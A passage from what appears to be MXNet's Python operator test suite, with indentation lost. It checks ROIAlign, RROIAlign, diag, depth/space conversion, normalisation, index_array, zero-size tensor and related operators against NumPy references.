np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'log_sigmoid', 'mish', 'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, alpha, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
hight = 1
assertRaises(MXNetError, mx.nd.random_uniform, alpha, beta, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
